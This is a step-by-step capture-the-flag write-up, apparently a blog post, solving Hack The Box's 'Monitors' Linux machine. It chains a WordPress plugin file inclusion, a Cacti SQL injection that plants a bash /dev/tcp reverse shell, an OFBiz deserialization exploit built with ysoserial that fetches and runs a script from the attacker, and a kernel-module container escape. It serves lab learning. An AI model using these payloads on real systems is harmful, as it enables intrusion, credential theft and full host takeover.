
Monitors - Hack The Box

Info Card

Today we will be solving Hack The Box’s Monitors machine. It is a hard-level Linux machine, as listed on the platform. Despite its difficulty, there’s no reason to feel intimidated, as it covers various techniques and vulnerabilities, making it an excellent opportunity to learn and practice, all detailed step by step.

Reconnaissance Phase

First, we’re going to launch an ICMP traceroute to check if the machine is active.

ping -c 1


Once we verify that the machine is active (as it returns a response), we can also determine what type of machine we are dealing with based on the TTL value; in this case, the machine’s TTL value is 63, so we can infer that we are dealing with a Linux machine. Remember, some of the reference values are as follows:

Operating System (OS) TTL
Linux 64
Windows 128
Solaris 254

If we notice, in this case, the TTL value is 63 instead of 64 as indicated in the table above. This is because, in the Hack The Box environment, we are not communicating directly with the target machine; instead, there is an intermediary node, which causes the TTL to decrease by one unit.

ping -c 1 -R


Next, we will use the Nmap tool to determine which ports are open, as well as identify the version and services running on the asset. To determine which ports are open, we can do the following:

nmap -p- --open -T5 -v -n

If the scan takes too long to complete, we have this alternative:

sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn

Below is an explanation of the parameters used in the port scan with Nmap:

Parameter Explanation
-p- Scans the entire range of ports (65535 in total)
--open Shows all ports that are open (or possibly open)
-T5 The timing template allows us to speed up our scan; this value can range from 0 to 5. Note that the higher the value of the template, the more “noise” we generate, but that’s okay, right? After all, we’re practicing in a controlled environment, and here we are all White Hat
-v Verbose, reports findings to the console
-n Do not apply DNS resolution
-sS TCP SYN scan
-min-rate Send packets no slower than <value> per second
-vvv Triple verbose, to get more information in the console
-Pn Do not apply host discovery

Once we have detected the open ports on the asset, we can move on to determine the version and services running on these ports.

nmap -sC -sV -p 22,80

Below is an explanation of the parameters used in the version and service scan with Nmap:

Parameter Explanation
-sC Basic enumeration scripts
-sV Version and services running on the found ports
-p Specify which ports we want to analyze (those found open in the previous step)

Based on the information reported by Nmap, we can see that the victim machine has open ports related to SSH (22) and HTTP (80).

Exploitation Phase

To enumerate the HTTP service, we will use WhatWeb, a tool that identifies the web technologies in use. This includes content management systems (CMS), libraries, plugins, or even the operating system hosting the web server.


The scan returns a 403 Forbidden status code, indicating that direct access is restricted. However, we can see that the server is running Apache 2.4.29 as the web server and it also reveals an email address, although this information does not directly provide much else.


Since we can’t obtain any more useful information from the terminal, we will need to visit the page from our browser. Upon access, we observe a message indicating that direct access by IP is not allowed, and it suggests contacting the site administrator via an email address with the domain monitors.htb. This detail is relevant as the domain in the email address could be a clue indicating the use of virtual hosting; that is, the server uses specific domain names to identify hosted sites.


To verify this, we will edit the /etc/hosts file so that the domain name resolves to the IP address of the corresponding server.


Once this change is made, after re-running our Nmap and WhatWeb scans, we now obtain much more information:



The most relevant findings from this new scan are that the server is using WordPress 5.5.1, which allows us to identify the content management system in use, and confirms that the server is running on Ubuntu.

After spending some time exploring the page, we did not find anything of particular interest. However, knowing that the site uses WordPress, we can search for common paths such as admin panels, content directories, and other typical CMS routes.


In my case, I decided to apply fuzzing to find these potential paths.

wfuzz -c -L -t 400 --hc 404 --hh 12759 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://monitors.htb/FUZZ


Among the paths found, we discovered the wp-admin panel; however, attempting to access it with default known credentials will not be effective in this case.


We also discovered that the wp-content directory is accessible, which represents a configuration error, as this directory contains CMS resources that should be protected. Within this directory, we can perform a second fuzzing (or alternatively, we could manually search for specific paths), which leads us to the plugins directory.

wfuzz -c -L -t 400 --hc 404 --hh 0 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://monitors.htb/wp-content/FUZZ


Here, we find the wp-with-spritz plugin.



By downloading its readme.txt file and reviewing it, we confirm that version 1.0 of this plugin is in use.


With this information, we can proceed to investigate whether this version has any known vulnerabilities that we can exploit. We can do this directly from the console using searchsploit, or by searching online on Exploit Database.

searchsploit spritz


We find an exploit for this version that exploits a Remote File Inclusion (RFI) vulnerability.


To test this, we can create any text file and, using Python, we can host an HTTP server from the same file path to make it accessible via:

python3 -m http.server 80

Now, if we point to the URL below, we will see that we can read the contents we wrote in our text file.



However, if we try to load a reverse shell, it will not execute because the RFI uses the file_get_contents function, which simply reads the file content as text, without interpreting or executing any PHP code it contains.


However, even though we cannot exploit this RFI, we can take advantage of the Local File Inclusion (LFI) vulnerability, which we already explained in a previous article. We confirm that we have read access, as we manage to list the contents of /etc/passwd.



Reading this file from the browser can be tricky, so we could use Ctrl + U to view it more effectively.


Since we have access to files on the system, the next logical step is to search for important configuration files. For example, the wp-config.php file from WordPress often contains sensitive information, such as the username, password, and database name required for WordPress to connect to its database. This file is usually located in /var/www/wordpress, so we could access this path to read its contents.



Although we can try these credentials in the wp-admin panel, they will not allow us to log in.


The next step is to explore the Apache configuration files. Apache is installed by default in /etc/apache2/, so we can try reading the apache2.conf file, which is the main configuration file for the web server. Additionally, this file provides a basic view of the hierarchical structure of its configuration files, which suggests potential paths to look for other interesting files.

To better understand this hierarchy and adapt to the specific configurations of this server, we can refer to this documentation. It’s important to note that, as we observed earlier, Apache is running on Ubuntu, so its configuration may differ from other operating systems, where certain paths or configuration files might be located elsewhere.


Whether because we suspect there might be additional configurations or because we’ve carefully examined Apache's configuration files, we find clues about the possible existence of additional domains. For instance, in the ports.conf file, it mentions that any port changes or additions may require adjustments to the VirtualHost statement in /etc/apache2/sites-enabled/000-default.conf. This reminds us that the server has been applying virtual hosting from the start, which could indicate the presence of domains we are not aware of yet.



By examining the 000-default.conf file, we discover that the server is indeed hosting a second domain. We also notice that this configuration is the one used for default access when no specific domain is applied, showing the same message we saw when trying to access by IP, where it tells us that direct access is restricted.



Since Apache organizes virtual site configurations in the /etc/apache2/sites-available/ directory, this is where we look for the .conf files that define each domain. When reviewing monitors.htb.conf, we see that the domain monitors.htb has its root set to /var/www/wordpress, just as we initially assumed when identifying the use of WordPress.



On the other hand, when inspecting cacti-admin.monitors.htb.conf, we discover that the domain cacti-admin.monitors.htb has its content located in /usr/share/cacti.



With this information and knowing about the existence of this second domain, we can also add it to the /etc/hosts file and explore what it is about.


Upon reaching this second domain, cacti-admin.monitors.htb, we encounter a login panel for Cacti. Cacti is a network monitoring tool that allows the collection and graphing of performance data. We can try the credentials we obtained earlier from the wp-config.php file, and we see that they work, which highlights another bad security practice: credential reuse.


Once inside, we notice that we are using version 1.2.12 of Cacti, which leads us to investigate if this version has any known vulnerabilities.


To check, we can search online on Exploit Database or directly from the console using searchsploit:

searchsploit cacti 1.2.12


This search reveals an SQL injection vulnerability in one of the application’s parameters. Although we could execute the exploit as is, it is more valuable to understand how it works for practicing SQL injections.


In the Cacti interface, the vulnerability is located in the filter parameter of the following URL:


This parameter is located in the Presets section of the left menu, under the Color option, which displays a table with a list of colors and their properties. By manipulating this parameter, we can inject SQL commands and alter the queries to the database.


We will start by injecting the classic payload ')+UNION+SELECT+NULL;--+- to calculate the number of columns in the query.



We will continue adding NULL until we find the correct number of columns, and by adding seven NULL, we manage to download a CSV file named colors.csv. This confirms that the original SQL query has seven columns.



Now we are interested in listing all the tables in the database; for this, we will use the following payload:



Among the listed tables, we identify one of interest called user_auth. We proceed to discover the names of its columns with the following injection:



Among the columns, we are interested in username and password. Using the following injection, we will list the values of these columns:


This reveals two users: admin and guest, although their passwords are hashed.


However, there is a second injection that allows us to obtain a reverse shell inside the machine. This injection is performed as follows:

http://cacti-admin.monitors.htb/cacti/color.php?action=export&filter=1')+UPDATE+settings+SET+value='bash -i >& /dev/tcp/<ourIP>/443 0>&1;'+WHERE+name='path_php_binary';--+-

By modifying the path_php_binary parameter in the settings table to point to a reverse shell instead of the PHP executable, we manage to execute our command. This happens because Cacti uses the value of this parameter in the host_reindex() function, located in the file host.php. The logic behind this is as follows:

switch (get_request_var('action')) {
	case 'reindex':

		header('Location: host.php?action=edit&id=' . get_request_var('host_id'));


When the action parameter is equal to reindex, the host_reindex() function is executed, which uses the shell_exec() function to run the command defined in path_php_binary. This allows our reverse shell to be executed instead of the legitimate PHP script. The code for the host_reindex() function is as follows:

function host_reindex() {    
    global $config;

	$start = microtime(true);

	shell_exec(read_config_option('path_php_binary') . ' -q ' . CACTI_PATH_CLI . '/poller_reindex_hosts.php --qid=all --id=' . get_filter_request_var('host_id'));

	$end = microtime(true);

	$total_time = $end - $start;

	$items = db_fetch_cell_prepared('SELECT COUNT(*)
		FROM host_snmp_cache
		WHERE host_id = ?',

	raise_message('host_reindex', __('Device Reindex Completed in %0.2f seconds.  There were %d items updated.', $total_time, $items), MESSAGE_LEVEL_INFO);

Once we have modified the path_php_binary parameter, we will set our machine to listen using Netcat to receive the reverse shell:

nc -nlvp 443

We can navigate to http://cacti-admin.monitors.htb/cacti/host.php?action=reindex or, from the console itself, execute it with:

curl http://cacti-admin.monitors.htb/cacti/host.php?action=reindex

By doing so, we manage to establish the reverse shell, gaining direct access to the machine. Once inside the machine, we can confirm our presence in the system using the following command:

hostname -I

This shows us a list of available IP addresses on the machine, including,, and While we are indeed on the victim machine, the presence of addresses in the range suggests network configurations related to Docker, as Docker typically assigns IP addresses in this range for container internal networks.


To verify if Docker is active on the machine, we can check if the Docker socket exists by running:

ls -l /var/run/docker.sock

This shows that the socket is owned by the user root and the group docker, indicating that access to the Docker daemon is restricted to these users and members of the docker group. This means that our current user doesn’t have permission to interact with Docker directly, so commands like docker ps or docker info won’t be effective.

Another way to confirm if Docker is running is to inspect active processes with:

ps aux | grep dockerd

This command shows that the dockerd process (the Docker daemon) is running, confirming that Docker is active on the system.

The fact that Docker is running on the victim machine is relevant, as it could open up new opportunities for privilege escalation or system exploitation. If we find any running container that is misconfigured or running services with elevated permissions, we could exploit this vulnerability to gain additional privileges or even interact with the host machine’s resources from within a container.


From here, we continue exploring the machine. In the /home directory, we find a user marcus. If we access his home directory, we find the first flag and a file called note.txt; however, both are protected to be read only by the user himself. This suggests that we will eventually need to become the marcus user to gain access to the flag and see what the note is about.

Additionally, we discover that in his home directory there is a hidden directory called .backup, which catches our attention. Backup directories often contain backup copies that could include sensitive information, such as access credentials or important configurations. However, we cannot read this directory directly since we only have execute (traverse) permissions, meaning we can navigate inside it but cannot list or inspect its contents, and will only be able to access files whose names we know.



The fact that there is a backup mechanism on the machine leads us to investigate further, so we perform a recursive search on the system for backup-related files:

find /etc /home /lib /opt /tmp /usr /var -type f -iname '*backup*' 2>/dev/null

In the results, we find a file called cacti-backup-service, which is interesting because it is related to Cacti, the system we saw earlier.


This file defines a service that runs as the www-data user and calls the script located in the .backup directory inside the marcus home directory.


When reviewing the contents of, we see that the script compresses the Cacti files into a ZIP archive, which is then transferred to a remote location using SSH. The script provides a password for authentication, which we will attempt to use to connect via SSH as the marcus user and gain direct access to his account.


ssh marcus@

In this way, we gain access to the marcus account and can finally read the first flag.


Privilege Escalation

Once inside as the marcus user, we can read the note we had previously found. It refers to the update of the Docker image for production use, which confirms the presence of Docker, something we had already verified earlier.


After further exploring the machine, we discover that there are more open ports than we initially recorded with Nmap. These ports, known as internal ports, are only available locally on the machine itself. Ports 8443 (HTTPS), 3306 (MySQL), and 53 (DNS) are configured to accept connections only from the local address (, so they are not accessible from outside the machine. On the other hand, ports 22 (SSH) and 80 (HTTP) are the ones we had already seen externally with Nmap and are available for external connections.

netstat -nlpt


Out of these ports, we will focus on the web port (8443), as it is associated with an HTTPS service that is only accessible locally. To access this port from our machine, we will use local port forwarding. Local port forwarding is a technique where we redirect traffic from a port on our local machine to a port on the remote machine through an SSH connection. This allows us to interact with services that are only available locally on the victim machine, such as in this case, the HTTPS service on port 8443.

To achieve this, we run the following command:

ssh -L 8443:localhost:8443 marcus@

This command sets up an SSH tunnel, forwarding port 8443 on our local machine to port 8443 on the remote machine, which is only locally available. This way, we can access this service from our local browser by simply visiting https://localhost:8443.


With the SSH tunnel set up, we successfully connect to the local web port 8443 and start exploring the application. Since we have no clear information about its structure or the type of service running, we can apply fuzzing to discover potential paths and directories.

wfuzz -c -L -t 400 --hc 404 --hh 800 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt https://localhost:8443/FUZZ


Among them, the main path indicates that we can log in using the username admin and the password ofbiz.


On the other hand, the bi and example paths lead us to an authentication panel in an Apache OFBiz system. When trying to use these credentials, we receive a message stating that the user does not exist. However, the most relevant detail here is that this panel provides the version of Apache OFBiz being used: 17.12.01.


As we have been doing, we will investigate whether this version of Apache OFBiz has any known vulnerabilities that we can exploit. We can do this by searching online, on Exploit Database, or directly from the console using searchsploit:

searchsploit ofbiz 17.12.01


Among the results, we find an exploit that provides remote code execution (RCE) via a deserialization attack. While we could execute it directly, it is more valuable to understand how it works in order to practice the deserialization process and manually manipulate the exploit, giving us greater control and understanding of the attack.


First, we will download ysoserial, a tool that allows us to generate serialized Java objects with malicious payloads. This is useful in deserialization attacks, where by sending a specially crafted serialized object, we can execute code on the server if it processes (deserializes) the object without proper validation.

Next, we will write a reverse shell in Bash. This reverse shell will allow us to gain remote access from the server to our machine. To do this, we will create a file called with the following content:

/bin/bash -i >& /dev/tcp/<ourIP>/443 0>&1


Next, we will generate the payload in JAR format, using the CommonsBeanutils1 class. This class is part of Apache Commons and has been exploited in the past to execute arbitrary code in serialized objects. By using ysoserial together with CommonsBeanutils1, we can embed commands into a serialized object that the server will execute when it deserializes it. In this case, the payload is designed so that the server will download our file into the victim machine’s temporary directory (/tmp). We will encode the output of the payload in base64 to facilitate transmission and avoid issues during the process:

java -jar ysoserial-all.jar CommonsBeanutils1 "wget <ourIP>/ -O /tmp/" | base64 | tr -d "\n"; echo


To make the file available and downloadable on the victim machine, we will start a local HTTP server using Python:

python3 -m http.server 80

With this server running, we can now send our first payload to the target server. We will use curl to send a request to the webtools/control/xmlrpc endpoint on port 8443. This request includes the base64-encoded payload inside the <serializable> tag. When the request is processed, the server will deserialize the object and download the reverse shell script.

curl -s -X POST -d "<?xml version='1.0'?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns=''> PAYLOAD </serializable></value></member></struct></value></param></params></methodCall>" -k  -H 'Content-Type:application/xml' &>/dev/null

Here, PAYLOAD is the base64 content that we generated in the previous step.


After sending the initial payload to download, we will generate a second payload in JAR format that will execute this file on the server. This second payload will be generated using the same base64 encoding process:

java -jar ysoserial-all.jar CommonsBeanutils1 "bash /tmp/" | base64 | tr -d "\n"; echo


Before sending this second payload, we will set our machine to listen using Netcat to receive the reverse shell:

nc -nlvp 443

Finally, we send the second payload using curl in the same way as the first one. Once this request is executed, the server will run the file and we will obtain a reverse shell within the victim machine.

curl -s -X POST -d "<?xml version='1.0'?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns=''> PAYLOAD </serializable></value></member></struct></value></param></params></methodCall>" -k  -H 'Content-Type:application/xml' &>/dev/null

Once inside the victim machine, we can confirm our presence on the system using the command:

hostname -I

However, instead of being directly on the victim machine, we are inside a container, with the IP address Something curious is that when running the whoami command, we discover that we are the root user, indicating that we have administrator privileges within the container.


Since we are root, the next step would be to attempt to escape this environment. As we already have administrator privileges, we can try to perform a docker breakout to gain access to the host machine while preserving our root status.

By default, Docker assigns certain capabilities to containers. Although the set of assigned capabilities is minimal to hinder exploitation, there are certain capabilities that, if present, can allow us to escape the container. We can list the existing capabilities with the following command:

capsh --print


Among the capabilities found in the container, we identified CAP_DAC_OVERRIDE and CAP_SYS_MODULE, both of which we could attempt to exploit. With CAP_DAC_OVERRIDE, we could write to the host machine’s filesystem. However, for this to be possible, the CAP_DAC_READ_SEARCH capability must also be present, which is not the case here, so this exploitation path is not viable. Instead, we can exploit CAP_SYS_MODULE.

This capability allows processes to load and unload kernel modules, enabling us to inject code directly into the system’s kernel. Since containers are isolated at the operating system (OS) level but share the kernel with the host system, this capability allows us to interact with it through the container. This enables us to fully compromise the system by modifying the kernel and bypassing all Linux security barriers, including security modules and the container’s isolation itself.

To take advantage of the CAP_SYS_MODULE capability and escape the container, we will write a kernel module that opens a reverse shell to our attacker machine. This module will be compiled using a Makefile, and then injected into the host system’s kernel to execute the code.

We will write a reverse-shell.c file that contains the code for the kernel module:

#include <linux/kmod.h>
#include <linux/module.h>

char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/<ourIP>/4444 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };

static int __init reverse_shell_init(void) {
    return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);

static void __exit reverse_shell_exit(void) {
    printk(KERN_INFO "Exiting\n");


This code defines a kernel module that uses the call_usermodehelper function to execute the command that will open a reverse shell on the host system. When the module is initialized through reverse_shell_init, the command is executed, establishing a connection to our IP on port 4444.


On the other hand, we will define a Makefile that automates the process of compiling the module:

obj-m +=reverse-shell.o

	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

This Makefile is responsible for creating the binary file for the module (reverse-shell.ko) using the source code reverse-shell.c. The line make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules tells the compiler to use the active version of the kernel on the host system to build the module. The make clean command, on the other hand, removes any files generated during the compilation process, keeping the environment clean.


Once again, we will host a server on our attacking machine using Python:

python3 -m http.server 80

From the container, we will download the two files we just created using wget.

wget http://<ourIP>:80/reverse-shell.c
wget http://<ourIP>:80/Makefile


Next, we will run the make command to compile the module, which will generate the reverse-shell.ko file.



Now, we will start listening on our attacking machine using Netcat on the port we defined in reverse-shell.c:

nc -nlvp 4444

Finally, we will inject the module into the kernel using:

insmod reverse-shell.ko

By running this command, we will get a reverse shell on the host machine, this time with root privileges, allowing us to list the final flag.